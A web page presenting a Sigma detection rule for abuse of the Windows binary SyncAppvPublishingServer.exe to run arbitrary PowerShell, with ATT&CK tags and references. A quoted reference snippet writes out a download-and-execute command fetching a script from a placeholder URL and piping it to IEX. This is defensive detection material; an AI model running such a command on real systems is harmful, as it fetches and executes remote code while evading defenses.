SyncAppvPublishingServer Execute Arbitrary PowerShell Code
Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
Sigma rule (View on GitHub)
1title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code
2id: fbd7c32d-db2a-4418-b92c-566eb8911133
3related:
4 - id: fde7929d-8beb-4a4c-b922-be9974671667
5 type: obsoletes
6status: test
7description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
8references:
9 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
10 - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
11author: frack113
12date: 2021/07/12
13modified: 2022/10/04
14tags:
15 - attack.defense_evasion
16 - attack.t1218
17logsource:
18 category: process_creation
19 product: windows
20detection:
21 selection_img:
22 - Image|endswith: '\SyncAppvPublishingServer.exe'
23 - OriginalFileName: 'syncappvpublishingserver.exe'
24 selection_cli:
25 CommandLine|contains: '"n; '
26 condition: all of selection_*
27fields:
28 - ComputerName
29 - User
30 - CommandLine
31 - ParentCommandLine
32falsepositives:
33 - App-V clients
34level: medium
References
-
Small and highly portable detection tests based on MITRE's ATT&CK. - redcanaryco/atomic-red-team
Read More -
Example command on how inject Powershell code into the process SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Use caseUse SyncAppvPub...
Read More
Related rules
- Created Files by Microsoft Sync Center
- DeviceCredentialDeployment Execution
- Execute MSDT Via Answer File
- Execute Pcwrun.EXE To Leverage Follina
- Ie4uinit Lolbin Use From Invalid Path